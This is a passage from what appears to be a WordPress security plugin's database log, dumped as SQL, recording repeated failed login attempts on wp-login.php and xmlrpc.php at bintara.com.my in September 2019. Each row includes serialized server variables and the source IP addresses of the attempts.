empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"56118\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGO5yqbKGlf1IVly7OMwgAAAVM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568771815.823\";s:12:\"REQUEST_TIME\";s:10:\"1568771815\";}}','notice','2019-09-18 01:56:57','2019-09-18 01:56:56',18253112,19551264,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.100.42'),(24840,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"55696\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGO5EQGijxhVPhG1M0JkAAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771812.8974\";s:12:\"REQUEST_TIME\";s:10:\"1568771812\";}}','notice','2019-09-18 01:56:54','2019-09-18 01:56:53',17737920,19228056,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(24839,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"93.171.202.120\";s:11:\"REMOTE_PORT\";s:5:\"59594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGNjSR0vdvYEIduPCLUdwAAAQ4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771469.8128\";s:12:\"REQUEST_TIME\";s:10:\"1568771469\";}}','notice','2019-09-18 01:51:11','2019-09-18 01:51:10',18253112,19551264,'https://bintara.com.my/xmlrpc.php',1,0,'93.171.202.120'),(24838,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"93.171.202.120\";s:11:\"REMOTE_PORT\";s:5:\"58812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGNiiR0vdvYEIduPCLUdQAAAQ8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771466.7865\";s:12:\"REQUEST_TIME\";s:10:\"1568771466\";}}','notice','2019-09-18 01:51:08','2019-09-18 01:51:07',17737544,19228816,'https://bintara.com.my/wp-login.php',1,0,'93.171.202.120'),(24837,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"33360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGL7SqbKGlf1IVly7OJ4AAAAUE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771053.8846\";s:12:\"REQUEST_TIME\";s:10:\"1568771053\";}}','notice','2019-09-18 01:44:15','2019-09-18 01:44:14',18253632,19549352,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(24836,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"60744\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGL624SfF9g@8lNlxwpVwAAAEI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568771051.4485\";s:12:\"REQUEST_TIME\";s:10:\"1568771051\";}}','notice','2019-09-18 01:44:13','2019-09-18 01:44:11',17737856,19227944,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24835,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"165.22.56.21\";s:11:\"REMOTE_PORT\";s:5:\"53826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGIsyqbKGlf1IVly7OHhAAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568770227.7225\";s:12:\"REQUEST_TIME\";s:10:\"1568770227\";}}','notice','2019-09-18 01:30:29','2019-09-18 01:30:28',18252112,19549816,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.56.21'),(24834,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"165.22.56.21\";s:11:\"REMOTE_PORT\";s:5:\"53256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGIsCqbKGlf1IVly7OHgwAAAVI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568770224.7703\";s:12:\"REQUEST_TIME\";s:10:\"1568770224\";}}','notice','2019-09-18 01:30:26','2019-09-18 01:30:25',17737872,19229240,'https://bintara.com.my/wp-login.php',1,0,'165.22.56.21'),(24833,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"49160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGIeiqbKGlf1IVly7OHUQAAAVM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568770170.5306\";s:12:\"REQUEST_TIME\";s:10:\"1568770170\";}}','notice','2019-09-18 01:29:31','2019-09-18 01:29:30',18253632,19549352,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(24832,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 